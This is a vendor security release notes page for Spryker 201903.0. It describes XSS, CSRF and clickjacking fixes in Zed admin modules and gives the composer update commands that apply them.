Security Release Notes 201903.0

Edit on GitHub

The following information pertains to security-related issues that were discovered and resolved.

Issues are listed by description and affected modules.

If you need any additional support with this content, please contact

First, two potential vulnerabilities require direct Zed access to be exploitable; it is advised to always secure Zed, review users having access and put Zed into demilitarized zones in your infrastructure perimeter.

Possible Cross-Site Scripting (XSS)

An admin user was able to save raw HTML in product attributes, glossary and user roles management in Zed. Additional filtering has been added.

Affected modules:

  • ProductAttribute (1.1.2)
  • ProductAttributeGui (1.2.1)
  • Glossary (3.5.2)
  • Acl (3.1.2)

How to get the fix: Just update modules with’

composer update spryker/acl spryker/glossary spryker/product-attribute-gui spryker/product-attribute

Possible Cross-Site Request Forgery (CSRF)

Product attribute forms were missing CSRF form tokens.

Affected module:
ProductAttributeGui (1.1.0)

How to get the fix: Just update modules with

composer update spryker/product-attribute-gui

Potential Clickjacking

The additional header Content-Security-Policy has been added by default.

Affected module:
Application (3.14.0)

How to get the fix: Just update modules with

composer update spryker/application

Default Application Environment

This one is not a security vulnerability, but to prevent fatal mistakes, the default value of APPLICATION_ENV, when it is not passed from the system environment, has been set to production in the Install module.

Affected module:
Install (0.5.1)